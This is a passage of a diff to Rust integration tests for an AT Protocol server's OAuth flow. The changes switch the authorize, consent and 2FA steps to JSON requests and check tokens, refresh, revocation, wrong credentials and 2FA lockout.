assert_eq!(missing_res.status(), StatusCode::BAD_REQUEST); 168 + let missing_client = no_redirect_client(); 169 + let missing_res = missing_client 170 + .get(format!("{}/oauth/authorize", url)) 171 + .send() 172 + .await 173 + .unwrap(); 174 + assert!( 175 + missing_res.status().is_redirection(), 176 + "Should redirect to error page" 177 + ); 178 + let error_location = missing_res 179 + .headers() 180 + .get("location") 181 + .unwrap() 182 + .to_str() 183 + .unwrap(); 184 + assert!( 185 + error_location.contains("oauth/error"), 186 + "Should redirect to error page" 187 + ); 111 188 } 112 189 113 190 #[tokio::test] ··· 121 198 let create_res = http_client 122 199 .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 123 200 .json(&json!({ "handle": handle, "email": email, "password": password })) 124 - .send().await.unwrap(); 201 + .send() 202 + .await 203 + .unwrap(); 125 204 assert_eq!(create_res.status(), StatusCode::OK); 126 205 let account: Value = create_res.json().await.unwrap(); 127 206 let user_did = account["did"].as_str().unwrap(); ··· 133 212 let state = format!("state-{}", ts); 134 213 let par_res = http_client 135 214 .post(format!("{}/oauth/par", url)) 136 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 137 - ("code_challenge", &code_challenge), ("code_challenge_method", "S256"), ("scope", "atproto"), ("state", &state)]) 138 - .send().await.unwrap(); 215 + .form(&[ 216 + ("response_type", "code"), 217 + ("client_id", &client_id), 218 + ("redirect_uri", redirect_uri), 219 + ("code_challenge", &code_challenge), 220 + ("code_challenge_method", "S256"), 221 + ("scope", "atproto"), 222 + ("state", &state), 223 + ]) 224 + .send() 225 + .await 226 + .unwrap(); 139 227 let par_body: Value = par_res.json().await.unwrap(); 140 228 let request_uri = par_body["request_uri"].as_str().unwrap(); 141 - let auth_client = no_redirect_client(); 142 - let auth_res = auth_client 229 + let auth_res = http_client 143 230 .post(format!("{}/oauth/authorize", url)) 144 - .form(&[("request_uri", request_uri), ("username", &handle), ("password", password), ("remember_device", "false")]) 231 + .header("Content-Type", "application/json") 232 + .header("Accept", "application/json") 233 + .json(&json!({"request_uri": request_uri, "username": &handle, "password": password, "remember_device": false})) 145 234 .send().await.unwrap(); 146 - assert!(auth_res.status().is_redirection(), "Expected redirect, got {}", auth_res.status()); 147 - let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 148 - assert!(location.starts_with(redirect_uri), "Redirect to wrong URI"); 235 + assert_eq!( 236 + auth_res.status(), 237 + StatusCode::OK, 238 + "Expected OK with JSON response" 239 + ); 240 + let auth_body: Value = auth_res.json().await.unwrap(); 241 + let mut location = auth_body["redirect_uri"] 242 + .as_str() 243 + .expect("Expected redirect_uri in response") 244 + .to_string(); 245 + if location.contains("/oauth/consent") { 246 + let consent_res = http_client 247 + .post(format!("{}/oauth/authorize/consent", url)) 248 + .header("Content-Type", "application/json") 249 + .json(&json!({"request_uri": request_uri, "approved_scopes": ["atproto"], "remember": false})) 250 + .send().await.unwrap(); 251 + let consent_status = consent_res.status(); 252 + let consent_body: Value = consent_res.json().await.unwrap(); 253 + assert_eq!( 254 + consent_status, 255 + StatusCode::OK, 256 + "Consent should succeed. Got: {:?}", 257 + consent_body 258 + ); 259 + location = consent_body["redirect_uri"] 260 + .as_str() 261 + .expect("Expected redirect_uri from consent") 262 + .to_string(); 263 + } 264 + assert!( 265 + location.starts_with(redirect_uri), 266 + "Redirect to wrong URI: {}", 267 + location 268 + ); 149 269 assert!(location.contains("code="), "No code in redirect"); 150 - assert!(location.contains(&format!("state={}", state)), "Wrong state"); 151 - let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 270 + assert!( 271 + location.contains(&format!("state={}", state)), 272 + "Wrong state" 273 + ); 274 + let code = location 275 + .split("code=") 276 + .nth(1) 277 + .unwrap() 278 + .split('&') 279 + .next() 280 + .unwrap(); 152 281 let token_res = http_client 153 282 .post(format!("{}/oauth/token", url)) 154 - .form(&[("grant_type", "authorization_code"), ("code", code), ("redirect_uri", redirect_uri), 155 - ("code_verifier", &code_verifier), ("client_id", &client_id)]) 156 - .send().await.unwrap(); 283 + .form(&[ 284 + ("grant_type", "authorization_code"), 285 + ("code", code), 286 + ("redirect_uri", redirect_uri), 287 + ("code_verifier", &code_verifier), 288 + ("client_id", &client_id), 289 + ]) 290 + .send() 291 + .await 292 + .unwrap(); 157 293 assert_eq!(token_res.status(), StatusCode::OK, "Token exchange failed"); 158 294 let token_body: Value = token_res.json().await.unwrap(); 159 295 assert!(token_body["access_token"].is_string()); ··· 165 301 let refresh_token = token_body["refresh_token"].as_str().unwrap(); 166 302 let refresh_res = http_client 167 303 .post(format!("{}/oauth/token", url)) 168 - .form(&[("grant_type", "refresh_token"), ("refresh_token", refresh_token), ("client_id", &client_id)]) 169 - .send().await.unwrap(); 304 + .form(&[ 305 + ("grant_type", "refresh_token"), 306 + ("refresh_token", refresh_token), 307 + ("client_id", &client_id), 308 + ]) 309 + .send() 310 + .await 311 + .unwrap(); 170 312 assert_eq!(refresh_res.status(), StatusCode::OK); 171 313 let refresh_body: Value = refresh_res.json().await.unwrap(); 172 314 assert_ne!(refresh_body["access_token"].as_str().unwrap(), access_token); 173 - assert_ne!(refresh_body["refresh_token"].as_str().unwrap(), refresh_token); 315 + assert_ne!( 316 + refresh_body["refresh_token"].as_str().unwrap(), 317 + refresh_token 318 + ); 174 319 let introspect_res = http_client 175 320 .post(format!("{}/oauth/introspect", url)) 176 321 .form(&[("token", refresh_body["access_token"].as_str().unwrap())]) 177 - .send().await.unwrap(); 322 + .send() 323 + .await 324 + .unwrap(); 178 325 assert_eq!(introspect_res.status(), StatusCode::OK); 179 326 let introspect_body: Value = introspect_res.json().await.unwrap(); 180 327 assert_eq!(introspect_body["active"], true); 181 328 let revoke_res = http_client 182 329 .post(format!("{}/oauth/revoke", url)) 183 330 .form(&[("token", refresh_body["refresh_token"].as_str().unwrap())]) 184 - .send().await.unwrap(); 331 + .send() 332 + .await 333 + .unwrap(); 185 334 assert_eq!(revoke_res.status(), StatusCode::OK); 186 335 let introspect_after = http_client 187 336 .post(format!("{}/oauth/introspect", url)) 188 337 .form(&[("token", refresh_body["access_token"].as_str().unwrap())]) 189 - .send().await.unwrap(); 338 + .send() 339 + .await 340 + .unwrap(); 190 341 let after_body: Value = introspect_after.json().await.unwrap(); 191 - assert_eq!(after_body["active"], false, "Revoked token should be inactive"); 342 + assert_eq!( 343 + after_body["active"], false, 344 + "Revoked token should be inactive" 345 + ); 192 346 } 193 347 194 348 #[tokio::test] ··· 198 352 let ts = Utc::now().timestamp_millis(); 199 353 let handle = format!("wrong-creds-{}", ts); 200 354 let email = format!("wrong-creds-{}@example.com", ts); 201 - http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 355 + http_client 356 + .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 202 357 .json(&json!({ "handle": handle, "email": email, "password": "correct-password" })) 203 - .send().await.unwrap(); 358 + .send() 359 + .await 360 + .unwrap(); 204 361 let redirect_uri = "https://example.com/callback"; 205 362 let mock_client = setup_mock_client_metadata(redirect_uri).await; 206 363 let client_id = mock_client.uri(); 207 364 let (_, code_challenge) = generate_pkce(); 208 365 let par_body: Value = http_client 209 366 .post(format!("{}/oauth/par", url)) 210 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 211 - ("code_challenge", &code_challenge), ("code_challenge_method", "S256")]) 212 - .send().await.unwrap().json().await.unwrap(); 367 + .form(&[ 368 + ("response_type", "code"), 369 + ("client_id", &client_id), 370 + ("redirect_uri", redirect_uri), 371 + ("code_challenge", &code_challenge), 372 + ("code_challenge_method", "S256"), 373 + ]) 374 + .send() 375 + .await 376 + .unwrap() 377 + .json() 378 + .await 379 + .unwrap(); 213 380 let request_uri = par_body["request_uri"].as_str().unwrap(); 214 381 let auth_res = http_client 215 382 .post(format!("{}/oauth/authorize", url)) 383 + .header("Content-Type", "application/json") 216 384 .header("Accept", "application/json") 217 - .form(&[("request_uri", request_uri), ("username", &handle), ("password", "wrong-password"), ("remember_device", "false")]) 385 + .json(&json!({"request_uri": request_uri, "username": &handle, "password": "wrong-password", "remember_device": false})) 218 386 .send().await.unwrap(); 219 387 assert_eq!(auth_res.status(), StatusCode::FORBIDDEN); 220 388 let error_body: Value = auth_res.json().await.unwrap(); 221 389 assert_eq!(error_body["error"], "access_denied"); 222 390 let unsupported = http_client 223 391 .post(format!("{}/oauth/token", url)) 224 - .form(&[("grant_type", "client_credentials"), ("client_id", "https://example.com")]) 225 - .send().await.unwrap(); 392 + .form(&[ 393 + ("grant_type", "client_credentials"), 394 + ("client_id", "https://example.com"), 395 + ]) 396 + .send() 397 + .await 398 + .unwrap(); 226 399 assert_eq!(unsupported.status(), StatusCode::BAD_REQUEST); 227 400 let body: Value = unsupported.json().await.unwrap(); 228 401 assert_eq!(body["error"], "unsupported_grant_type"); 229 402 let invalid_refresh = http_client 230 403 .post(format!("{}/oauth/token", url)) 231 - .form(&[("grant_type", "refresh_token"), ("refresh_token", "invalid-token"), ("client_id", "https://example.com")]) 232 - .send().await.unwrap(); 404 + .form(&[ 405 + ("grant_type", "refresh_token"), 406 + ("refresh_token", "invalid-token"), 407 + ("client_id", "https://example.com"), 408 + ]) 409 + .send() 410 + .await 411 + .unwrap(); 233 412 assert_eq!(invalid_refresh.status(), StatusCode::BAD_REQUEST); 234 413 let body: Value = invalid_refresh.json().await.unwrap(); 235 414 assert_eq!(body["error"], "invalid_grant"); 236 415 let invalid_introspect = http_client 237 416 .post(format!("{}/oauth/introspect", url)) 238 417 .form(&[("token", "invalid.token.here")]) 239 - .send().await.unwrap(); 418 + .send() 419 + .await 420 + .unwrap(); 240 421 assert_eq!(invalid_introspect.status(), StatusCode::OK); 241 422 let body: Value = invalid_introspect.json().await.unwrap(); 242 423 assert_eq!(body["active"], false); ··· 244 425 .get(format!("{}/oauth/authorize", url)) 245 426 .header("Accept", "application/json") 246 427 .query(&[("request_uri", "urn:ietf:params:oauth:request_uri:expired")]) 247 - .send().await.unwrap(); 428 + .send() 429 + .await 430 + .unwrap(); 248 431 assert_eq!(expired_res.status(), StatusCode::BAD_REQUEST); 249 432 } 250 433 ··· 259 442 let create_res = http_client 260 443 .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 261 444 .json(&json!({ "handle": handle, "email": email, "password": password })) 262 - .send().await.unwrap(); 445 + .send() 446 + .await 447 + .unwrap(); 263 448 assert_eq!(create_res.status(), StatusCode::OK); 264 449 let account: Value = create_res.json().await.unwrap(); 265 450 let user_did = account["did"].as_str().unwrap(); 266 451 verify_new_account(&http_client, user_did).await; 267 452 let db_url = get_db_connection_string().await; 268 - let pool = sqlx::postgres::PgPoolOptions::new().max_connections(1).connect(&db_url).await.unwrap(); 453 + let pool = sqlx::postgres::PgPoolOptions::new() 454 + .max_connections(1) 455 + .connect(&db_url) 456 + .await 457 + .unwrap(); 269 458 sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1") 270 - .bind(user_did).execute(&pool).await.unwrap(); 459 + .bind(user_did) 460 + .execute(&pool) 461 + .await 462 + .unwrap(); 271 463 let redirect_uri = "https://example.com/2fa-callback"; 272 464 let mock_client = setup_mock_client_metadata(redirect_uri).await; 273 465 let client_id = mock_client.uri(); 274 466 let (code_verifier, code_challenge) = generate_pkce(); 275 467 let par_body: Value = http_client 276 468 .post(format!("{}/oauth/par", url)) 277 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 278 - ("code_challenge", &code_challenge), ("code_challenge_method", "S256")]) 279 - .send().await.unwrap().json().await.unwrap(); 469 + .form(&[ 470 + ("response_type", "code"), 471 + ("client_id", &client_id), 472 + ("redirect_uri", redirect_uri), 473 + ("code_challenge", &code_challenge), 474 + ("code_challenge_method", "S256"), 475 + ]) 476 + .send() 477 + .await 478 + .unwrap() 479 + .json() 480 + .await 481 + .unwrap(); 280 482 let request_uri = par_body["request_uri"].as_str().unwrap(); 281 - let auth_client = no_redirect_client(); 282 - let auth_res = auth_client 483 + let auth_res = http_client 283 484 .post(format!("{}/oauth/authorize", url)) 284 - .form(&[("request_uri", request_uri), ("username", &handle), ("password", password), ("remember_device", "false")]) 485 + .header("Content-Type", "application/json") 486 + .header("Accept", "application/json") 487 + .json(&json!({"request_uri": request_uri, "username": &handle, "password": password, "remember_device": false})) 285 488 .send().await.unwrap(); 286 - assert!(auth_res.status().is_redirection(), "Should redirect to 2FA page"); 287 - let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 288 - assert!(location.contains("/oauth/authorize/2fa"), "Should redirect to 2FA page, got: {}", location); 489 + assert_eq!( 490 + auth_res.status(), 491 + StatusCode::OK, 492 + "Should return OK with needs_2fa" 493 + ); 494 + let auth_body: Value = auth_res.json().await.unwrap(); 495 + assert!( 496 + auth_body["needs_2fa"].as_bool().unwrap_or(false), 497 + "Should need 2FA, got: {:?}", 498 + auth_body 499 + ); 289 500 let twofa_invalid = http_client 290 501 .post(format!("{}/oauth/authorize/2fa", url)) 291 - .form(&[("request_uri", request_uri), ("code", "000000")]) 292 - .send().await.unwrap(); 293 - assert_eq!(twofa_invalid.status(), StatusCode::OK); 294 - let body = twofa_invalid.text().await.unwrap(); 295 - assert!(body.contains("Invalid verification code") || body.contains("invalid")); 296 - let twofa_code: String = sqlx::query_scalar("SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1") 297 - .bind(request_uri).fetch_one(&pool).await.unwrap(); 298 - let twofa_res = auth_client 502 + .header("Content-Type", "application/json") 503 + .json(&json!({"request_uri": request_uri, "code": "000000"})) 504 + .send() 505 + .await 506 + .unwrap(); 507 + assert_eq!(twofa_invalid.status(), StatusCode::FORBIDDEN); 508 + let body: Value = twofa_invalid.json().await.unwrap(); 509 + assert!( 510 + body["error_description"] 511 + .as_str() 512 + .unwrap_or("") 513 + .contains("Invalid") 514 + || body["error"].as_str().unwrap_or("") == "invalid_code" 515 + ); 516 + let twofa_code: String = 517 + sqlx::query_scalar("SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1") 518 + .bind(request_uri) 519 + .fetch_one(&pool) 520 + .await 521 + .unwrap(); 522 + let twofa_res = http_client 299 523 .post(format!("{}/oauth/authorize/2fa", url)) 300 - .form(&[("request_uri", request_uri), ("code", &twofa_code)]) 301 - .send().await.unwrap(); 302 - assert!(twofa_res.status().is_redirection(), "Valid 2FA code should redirect"); 303 - let final_location = twofa_res.headers().get("location").unwrap().to_str().unwrap(); 524 + .header("Content-Type", "application/json") 525 + .json(&json!({"request_uri": request_uri, "code": &twofa_code})) 526 + .send() 527 + .await 528 + .unwrap(); 529 + assert_eq!( 530 + twofa_res.status(), 531 + StatusCode::OK, 532 + "Valid 2FA code should succeed" 533 + ); 534 + let twofa_body: Value = twofa_res.json().await.unwrap(); 535 + let final_location = twofa_body["redirect_uri"].as_str().unwrap(); 304 536 assert!(final_location.starts_with(redirect_uri) && final_location.contains("code=")); 305 - let auth_code = final_location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 537 + let auth_code = final_location 538 + .split("code=") 539 + .nth(1) 540 + .unwrap() 541 + .split('&') 542 + .next() 543 + .unwrap(); 306 544 let token_res = http_client 307 545 .post(format!("{}/oauth/token", url)) 308 - .form(&[("grant_type", "authorization_code"), ("code", auth_code), ("redirect_uri", redirect_uri), 309 - ("code_verifier", &code_verifier), ("client_id", &client_id)]) 310 - .send().await.unwrap(); 546 + .form(&[ 547 + ("grant_type", "authorization_code"), 548 + ("code", auth_code), 549 + ("redirect_uri", redirect_uri), 550 + ("code_verifier", &code_verifier), 551 + ("client_id", &client_id), 552 + ]) 553 + .send() 554 + .await 555 + .unwrap(); 311 556 assert_eq!(token_res.status(), StatusCode::OK); 312 557 let token_body: Value = token_res.json().await.unwrap(); 313 558 assert_eq!(token_body["sub"], user_did); ··· 324 569 let create_res = http_client 325 570 .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 326 571 .json(&json!({ "handle": handle, "email": email, "password": password })) 327 - .send().await.unwrap(); 572 + .send() 573 + .await 574 + .unwrap(); 328 575 let account: Value = create_res.json().await.unwrap(); 329 576 let user_did = account["did"].as_str().unwrap(); 330 577 verify_new_account(&http_client, user_did).await; 331 578 let db_url = get_db_connection_string().await; 332 - let pool = sqlx::postgres::PgPoolOptions::new().max_connections(1).connect(&db_url).await.unwrap(); 579 + let pool = sqlx::postgres::PgPoolOptions::new() 580 + .max_connections(1) 581 + .connect(&db_url) 582 + .await 583 + .unwrap(); 333 584 sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1") 334 - .bind(user_did).execute(&pool).await.unwrap(); 585 + .bind(user_did) 586 + .execute(&pool) 587 + .await 588 + .unwrap(); 335 589 let redirect_uri = "https://example.com/2fa-lockout-callback"; 336 590 let mock_client = setup_mock_client_metadata(redirect_uri).await; 337 591 let client_id = mock_client.uri(); 338 592 let (_, code_challenge) = generate_pkce(); 339 593 let par_body: Value = http_client 340 594 .post(format!("{}/oauth/par", url)) 341 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 342 - ("code_challenge", &code_challenge), ("code_challenge_method", "S256")]) 343 - .send().await.unwrap().json().await.unwrap(); 595 + .form(&[ 596 + ("response_type", "code"), 597 + ("client_id", &client_id), 598 + ("redirect_uri", redirect_uri), 599 + ("code_challenge", &code_challenge), 600 + ("code_challenge_method", "S256"), 601 + ]) 602 + .send() 603 + .await 604 + .unwrap() 605 + .json() 606 + .await 607 + .unwrap(); 344 608 let request_uri = par_body["request_uri"].as_str().unwrap(); 345 - let auth_client = no_redirect_client(); 346 - let auth_res = auth_client 609 + let auth_res = http_client 347 610 .post(format!("{}/oauth/authorize", url)) 348 - .form(&[("request_uri", request_uri), ("username", &handle), ("password", password), ("remember_device", "false")]) 611 + .header("Content-Type", "application/json") 612 + .header("Accept", "application/json") 613 + .json(&json!({"request_uri": request_uri, "username": &handle, "password": password, "remember_device": false})) 349 614 .send().await.unwrap(); 350 - assert!(auth_res.status().is_redirection()); 615 + assert_eq!( 616 + auth_res.status(), 617 + StatusCode::OK, 618 + "Should return OK with needs_2fa" 619 + ); 620 + let auth_body: Value = auth_res.json().await.unwrap(); 621 + assert!( 622 + auth_body["needs_2fa"].as_bool().unwrap_or(false), 623 + "Should need 2FA" 624 + ); 351 625 for i in 0..5 { 352 626 let res = http_client 353 627 .post(format!("{}/oauth/authorize/2fa", url)) 354 - .form(&[("request_uri", request_uri), ("code", "999999")]) 355 - .send().await.unwrap(); 628 + .header("Content-Type", "application/json") 629 + .json(&json!({"request_uri": request_uri, "code": "999999"})) 630 + .send() 631 + .await 632 + .unwrap(); 356 633 if i < 4 { 357 - assert_eq!(res.status(), StatusCode::OK); 634 + assert_eq!( 635 + res.status(), 636 + StatusCode::FORBIDDEN, 637 + "Attempt {} should return 403", 638 + i 639 + ); 358 640 } 359 641 } 360 642 let lockout_res = http_client 361 643 .post(format!("{}/oauth/authorize/2fa", url)) 362 - .form(&[("request_uri", request_uri), ("code", "999999")]) 363 - .send().await.unwrap(); 364 - let body = lockout_res.text().await.unwrap(); 365 - assert!(body.contains("Too many failed attempts") || body.contains("No 2FA challenge found")); 644 + .header("Content-Type", "application/json") 645 + .json(&json!({"request_uri": request_uri, "code": "999999"})) 646 + .send() 647 + .await 648 + .unwrap(); 649 + let body: Value = lockout_res.json().await.unwrap(); 650 + let desc = body["error_description"].as_str().unwrap_or(""); 651 + assert!( 652 + desc.contains("Too many") || desc.contains("No 2FA") || body["error"] == "invalid_request", 653 + "Expected lockout error, got: {:?}", 654 + body 655 + ); 366 656 } 367 657 368 658 #[tokio::test] ··· 376 666 let create_res = http_client 377 667 .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 378 668 .json(&json!({ "handle": handle, "email": email, "password": password })) 379 - .send().await.unwrap(); 669 + .send() 670 + .await 671 + .unwrap(); 380 672 let account: Value = create_res.json().await.unwrap(); 381 673 let user_did = account["did"].as_str().unwrap().to_string(); 382 674 verify_new_account(&http_client, &user_did).await; ··· 386 678 let (code_verifier, code_challenge) = generate_pkce(); 387 679 let par_body: Value = http_client 388 680 .post(format!("{}/oauth/par", url)) 389 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 390 - ("code_challenge", &code_challenge), ("code_challenge_method", "S256")]) 391 - .send().await.unwrap().json().await.unwrap(); 681 + .form(&[ 682 + ("response_type", "code"), 683 + ("client_id", &client_id), 684 + ("redirect_uri", redirect_uri), 685 + ("code_challenge", &code_challenge), 686 + ("code_challenge_method", "S256"), 687 + ]) 688 + .send() 689 + .await 690 + .unwrap() 691 + .json() 692 + .await 693 + .unwrap(); 392 694 let request_uri = par_body["request_uri"].as_str().unwrap(); 393 - let auth_client = no_redirect_client(); 394 - let auth_res = auth_client 695 + let auth_res = http_client 395 696 .post(format!("{}/oauth/authorize", url)) 396 - .form(&[("request_uri", request_uri), ("username", &handle), ("password", password), ("remember_device", "true")]) 697 + .header("Content-Type", "application/json") 698 + .header("Accept", "application/json") 699 + .json(&json!({"request_uri": request_uri, "username": &handle, "password": password, "remember_device": true})) 397 700 .send().await.unwrap(); 398 - assert!(auth_res.status().is_redirection()); 399 - let device_cookie = auth_res.headers().get("set-cookie") 701 + assert_eq!( 702 + auth_res.status(), 703 + StatusCode::OK, 704 + "Expected OK with JSON response" 705 + ); 706 + let device_cookie = auth_res 707 + .headers() 708 + .get("set-cookie") 400 709 .and_then(|v| v.to_str().ok()) 401 710 .map(|s| s.split(';').next().unwrap_or("").to_string()) 402 711 .expect("Should have device cookie"); 403 - let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 712 + let auth_body: Value = auth_res.json().await.unwrap(); 713 + let mut location = auth_body["redirect_uri"] 714 + .as_str() 715 + .expect("Expected redirect_uri") 716 + .to_string(); 717 + if location.contains("/oauth/consent") { 718 + let consent_res = http_client 719 + .post(format!("{}/oauth/authorize/consent", url)) 720 + .header("Content-Type", "application/json") 721 + .json(&json!({"request_uri": request_uri, "approved_scopes": ["atproto"], "remember": true})) 722 + .send().await.unwrap(); 723 + assert_eq!( 724 + consent_res.status(), 725 + StatusCode::OK, 726 + "Consent should succeed" 727 + ); 728 + let consent_body: Value = consent_res.json().await.unwrap(); 729 + location = consent_body["redirect_uri"] 730 + .as_str() 731 + .expect("Expected redirect_uri from consent") 732 + .to_string(); 733 + } 404 734 assert!(location.contains("code=")); 405 - let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 735 + let code = location 736 + .split("code=") 737 + .nth(1) 738 + .unwrap() 739 + .split('&') 740 + .next() 741 + .unwrap(); 406 742 let _ = http_client 407 743 .post(format!("{}/oauth/token", url)) 408 - .form(&[("grant_type", "authorization_code"), ("code", code), ("redirect_uri", redirect_uri), 409 - ("code_verifier", &code_verifier), ("client_id", &client_id)]) 410 - .send().await.unwrap().json::<Value>().await.unwrap(); 744 + .form(&[ 745 + ("grant_type", "authorization_code"), 746 + ("code", code), 747 + ("redirect_uri", redirect_uri), 748 + ("code_verifier", &code_verifier), 749 + ("client_id", &client_id), 750 + ]) 751 + .send() 752 + .await 753 + .unwrap() 754 + .json::<Value>() 755 + .await 756 + .unwrap(); 411 757 let db_url = get_db_connection_string().await; 412 - let pool = sqlx::postgres::PgPoolOptions::new().max_connections(1).connect(&db_url).await.unwrap(); 758 + let pool = sqlx::postgres::PgPoolOptions::new() 759 + .max_connections(1) 760 + .connect(&db_url) 761 + .await 762 + .unwrap(); 413 763 sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1") 414 - .bind(&user_did).execute(&pool).await.unwrap(); 764 + .bind(&user_did) 765 + .execute(&pool) 766 + .await 767 + .unwrap(); 415 768 let (code_verifier2, code_challenge2) = generate_pkce(); 416 769 let par_body2: Value = http_client 417 770 .post(format!("{}/oauth/par", url)) 418 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 419 - ("code_challenge", &code_challenge2), ("code_challenge_method", "S256")]) 420 - .send().await.unwrap().json().await.unwrap(); 771 + .form(&[ 772 + ("response_type", "code"), 773 + ("client_id", &client_id), 774 + ("redirect_uri", redirect_uri), 775 + ("code_challenge", &code_challenge2), 776 + ("code_challenge_method", "S256"), 777 + ]) 778 + .send() 779 + .await 780 + .unwrap() 781 + .json() 782 + .await 783 + .unwrap(); 421 784 let request_uri2 = par_body2["request_uri"].as_str().unwrap(); 422 - let select_res = auth_client 785 + let select_res = http_client 423 786 .post(format!("{}/oauth/authorize/select", url)) 424 787 .header("cookie", &device_cookie) 425 - .form(&[("request_uri", request_uri2), ("did", &user_did)]) 426 - .send().await.unwrap(); 427 - assert!(select_res.status().is_redirection()); 428 - let select_location = select_res.headers().get("location").unwrap().to_str().unwrap(); 429 - assert!(select_location.contains("/oauth/authorize/2fa"), "Should redirect to 2FA page"); 430 - let twofa_code: String = sqlx::query_scalar("SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1") 431 - .bind(request_uri2).fetch_one(&pool).await.unwrap(); 432 - let twofa_res = auth_client 788 + .header("Content-Type", "application/json") 789 + .json(&json!({"request_uri": request_uri2, "did": &user_did})) 790 + .send() 791 + .await 792 + .unwrap(); 793 + assert_eq!( 794 + select_res.status(), 795 + StatusCode::OK, 796 + "Select should return OK with JSON" 797 + ); 798 + let select_body: Value = select_res.json().await.unwrap(); 799 + assert!( 800 + select_body["needs_2fa"].as_bool().unwrap_or(false), 801 + "Should need 2FA" 802 + ); 803 + let twofa_code: String = 804 + sqlx::query_scalar("SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1") 805 + .bind(request_uri2) 806 + .fetch_one(&pool) 807 + .await 808 + .unwrap(); 809 + let twofa_res = http_client 433 810 .post(format!("{}/oauth/authorize/2fa", url)) 434 811 .header("cookie", &device_cookie) 435 - .form(&[("request_uri", request_uri2), ("code", &twofa_code)]) 436 - .send().await.unwrap(); 437 - assert!(twofa_res.status().is_redirection()); 438 - let final_location = twofa_res.headers().get("location").unwrap().to_str().unwrap(); 812 + .header("Content-Type", "application/json") 813 + .json(&json!({"request_uri": request_uri2, "code": &twofa_code})) 814 + .send() 815 + .await 816 + .unwrap(); 817 + assert_eq!( 818 + twofa_res.status(), 819 + StatusCode::OK, 820 + "Valid 2FA should succeed" 821 + ); 822 + let twofa_body: Value = twofa_res.json().await.unwrap(); 823 + let final_location = twofa_body["redirect_uri"].as_str().unwrap(); 439 824 assert!(final_location.starts_with(redirect_uri) && final_location.contains("code=")); 440 - let final_code = final_location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 825 + let final_code = final_location 826 + .split("code=") 827 + .nth(1) 828 + .unwrap() 829 + .split('&') 830 + .next() 831 + .unwrap(); 441 832 let token_res = http_client 442 833 .post(format!("{}/oauth/token", url)) 443 - .form(&[("grant_type", "authorization_code"), ("code", final_code), ("redirect_uri", redirect_uri), 444 - ("code_verifier", &code_verifier2), ("client_id", &client_id)]) 445 - .send().await.unwrap(); 834 + .form(&[ 835 + ("grant_type", "authorization_code"), 836 + ("code", final_code), 837 + ("redirect_uri", redirect_uri), 838 + ("code_verifier", &code_verifier2), 839 + ("client_id", &client_id), 840 + ]) 841 + .send() 842 + .await 843 + .unwrap(); 446 844 assert_eq!(token_res.status(), StatusCode::OK); 447 845 let final_token: Value = token_res.json().await.unwrap(); 448 846 assert_eq!(final_token["sub"], user_did); ··· 459 857 let create_res = http_client 460 858 .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 461 859 .json(&json!({ "handle": handle, "email": email, "password": password })) 462 - .send().await.unwrap(); 860 + .send() 861 + .await 862 + .unwrap(); 463 863 let account: Value = create_res.json().await.unwrap(); 464 864 verify_new_account(&http_client, account["did"].as_str().unwrap()).await; 465 865 let redirect_uri = "https://example.com/state-special-callback"; ··· 469 869 let special_state = "state=with&special=chars&plus+more"; 470 870 let par_body: Value = http_client 471 871 .post(format!("{}/oauth/par", url)) 472 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 473 - ("code_challenge", &code_challenge), ("code_challenge_method", "S256"), ("state", special_state)]) 474 - .send().await.unwrap().json().await.unwrap(); 872 + .form(&[ 873 + ("response_type", "code"), 874 + ("client_id", &client_id), 875 + ("redirect_uri", redirect_uri), 876 + ("code_challenge", &code_challenge), 877 + ("code_challenge_method", "S256"), 878 + ("state", special_state), 879 + ]) 880 + .send() 881 + .await 882 + .unwrap() 883 + .json() 884 + .await 885 + .unwrap(); 475 886 let request_uri = par_body["request_uri"].as_str().unwrap(); 476 - let auth_client = no_redirect_client(); 477 - let auth_res = auth_client 887 + let auth_res = http_client 478 888 .post(format!("{}/oauth/authorize", url)) 479 - .form(&[("request_uri", request_uri), ("username", &handle), ("password", password), ("remember_device", "false")]) 889 + .header("Content-Type", "application/json") 890 + .header("Accept", "application/json") 891 + .json(&json!({"request_uri": request_uri, "username": &handle, "password": password, "remember_device": false})) 480 892 .send().await.unwrap(); 481 - assert!(auth_res.status().is_redirection()); 482 - let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 893 + assert_eq!( 894 + auth_res.status(), 895 + StatusCode::OK, 896 + "Expected OK with JSON response" 897 + ); 898 + let auth_body: Value = auth_res.json().await.unwrap(); 899 + let mut location = auth_body["redirect_uri"] 900 + .as_str() 901 + .expect("Expected redirect_uri") 902 + .to_string(); 903 + if location.contains("/oauth/consent") { 904 + let consent_res = http_client 905 + .post(format!("{}/oauth/authorize/consent", url)) 906 + .header("Content-Type", "application/json") 907 + .json(&json!({"request_uri": request_uri, "approved_scopes": ["atproto"], "remember": false})) 908 + .send().await.unwrap(); 909 + assert_eq!( 910 + consent_res.status(), 911 + StatusCode::OK, 912 + "Consent should succeed" 913 + ); 914 + let consent_body: Value = 